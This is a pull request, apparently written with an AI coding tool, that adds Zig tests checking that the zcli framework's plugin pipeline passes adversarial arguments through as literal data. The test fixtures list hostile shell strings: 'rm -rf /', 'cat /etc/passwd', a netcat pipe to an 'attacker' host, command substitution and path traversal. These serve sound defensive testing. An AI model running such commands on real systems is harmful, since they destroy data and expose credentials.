### PR TITLE
test: push adversarial input through the full plugin pipeline

### DIFF
--- a/packages/core/src/plugin_pipeline_test.zig
+++ b/packages/core/src/plugin_pipeline_test.zig
@@ -390,3 +390,82 @@ test "pipeline: postExecute receives success=true after a successful command" {
     try run(App, &.{"greet"});
     try testing.expectEqual(@as(?bool, true), PostExecPlugin.success_seen);
 }
+
+// ---------------------------------------------------------------------------
+// Pipeline robustness against adversarial input
+//
+// security_test.zig and fuzz_test.zig feed malicious input to the parsers in
+// isolation. These push it through the *whole* `app.execute` pipeline — global
+// option scanning, value consumption, routing — which has its own arg handling
+// the parser-only tests never exercise. The contract: adversarial input is
+// treated as inert data (never interpreted, never crashes the pipeline).
+// ---------------------------------------------------------------------------
+
+const adversarial_inputs = [_][]const u8{
+    "$(whoami)",
+    "`id`",
+    "; rm -rf /",
+    "&& cat /etc/passwd",
+    "| nc attacker 1234",
+    "%s%s%s%n", // format-string attack
+    "../../../../etc/passwd",
+    "\x00hidden", // embedded null byte
+    "A" ** 4096, // oversized
+};
+
+test "pipeline security: adversarial command names route safely, never to a real command" {
+    const App = zcli.Registry.init(test_config)
+        .register("greet", Greet)
+        .registerPlugin(NotFoundPlugin) // swallow CommandNotFound
+        .build();
+
+    for (adversarial_inputs) |bad| {
+        Greet.executed = false;
+        // Must not panic. An error is acceptable; a crash or misroute is not.
+        run(App, &.{bad}) catch {};
+        try testing.expect(!Greet.executed);
+    }
+}
+
+test "pipeline security: global option values pass through verbatim (no interpretation)" {
+    const App = zcli.Registry.init(test_config)
+        .register("greet", Greet)
+        .registerPlugin(GlobalOptPlugin)
+        .build();
+
+    for (adversarial_inputs) |bad| {
+        GlobalOptPlugin.level_seen = null;
+        // `--level <bad>`: the value is consumed and handed to the plugin as-is.
+        try run(App, &.{ "--level", bad, "greet" });
+        try testing.expect(GlobalOptPlugin.level_seen != null);
+        try testing.expectEqualStrings(bad, GlobalOptPlugin.level_seen.?);
+    }
+}
+
+test "pipeline security: command arguments reach the command verbatim" {
+    const App = zcli.Registry.init(test_config)
+        .register("echo", Echo)
+        .build();
+
+    for (adversarial_inputs) |bad| {
+        Echo.last = "";
+        // A parse error is fine (no crash); when it parses, it must be literal.
+        run(App, &.{ "echo", bad }) catch continue;
+        try testing.expectEqualStrings(bad, Echo.last);
+    }
+}
+
+test "pipeline security: an oversized argument vector does not crash the pipeline" {
+    const App = zcli.Registry.init(test_config)
+        .register("echo", Echo)
+        .build();
+
+    var args = std.ArrayList([]const u8).empty;
+    defer args.deinit(testing.allocator);
+    try args.append(testing.allocator, "echo");
+    for (0..5000) |_| try args.append(testing.allocator, "x");
+
+    // Echo wants a single positional, so this errors — but it must not panic,
+    // leak, or corrupt state while scanning thousands of args.
+    run(App, args.items) catch {};
+}


### PR DESCRIPTION
Follow-up to the `test-plugins` work — the dedup pass on the lost `plugin_security_test.zig` (9 tests).

## Dedup verdict: don't restore any of the 9
Read all of them. None test real, enforced zcli behavior:
- **Dead API (all 9):** every test calls `Plugin.handleOption(ctx, OptionEvent) -> ?PluginResult` and `zcli.Context.init` — none of which exist anymore.
- **Self-referential (5):** "command injection", "sensitive option access", "file system access", "resource exhaustion", "information disclosure" each define a *mock plugin* that string-matches bad patterns and returns `"SECURITY_VIOLATION"`, then assert the mock matched. That tests the mock the test wrote, not the framework — and zcli never runs a shell, so there's nothing to inject into.
- **Tests a model zcli doesn't have (4):** "capability enforcement" / "plugin isolation" / "metadata validation" / "integration" assert against a sandbox + capability + plugin-name-validation system that doesn't exist. zcli plugins are comptime-trusted Zig compiled into the binary — no runtime loading, no sandbox. Aspirational, not behavioral.

Restoring them would re-create theater, so I didn't.

## What I added instead (the real gap)
`security_test.zig` and `fuzz_test.zig` only feed malicious input to the **parsers in isolation**. Nothing pushed it through the **full `app.execute` pipeline**, which has its own global-option scanning, value consumption, and routing. **4 new tests** (in `plugin_pipeline_test.zig`, reusing its harness):

| Test | Asserts |
|---|---|
| adversarial command names | shell metachars / format strings / null bytes / path traversal / 4 KB strings route safely and **never reach a real command** |
| global option values | reach `handleGlobalOption` **verbatim** — no shell or format-string interpretation |
| command arguments | reach the command **verbatim** |
| oversized arg vector (5000) | pipeline doesn't crash or leak while scanning it |

The contract: adversarial input is inert data — never interpreted, never crashes the pipeline.

## Verification
`zig build test` ✅ (all 9 packages, no leaks via testing allocator) · `zig build test-plugins` ✅. Pipeline test file: 10 → 14 tests.

## Separately (not in this PR)
The `onError` asymmetry surfaced in #11 is a real behavioral question — on a command-execution error the registry runs `onError` then `return err` unconditionally, so the `bool` can't suppress there (unlike the CommandNotFound path). Left as-is pending a decision on whether suppression should be symmetric.

🤖 Generated with [Claude Code](https://claude.com/claude-code)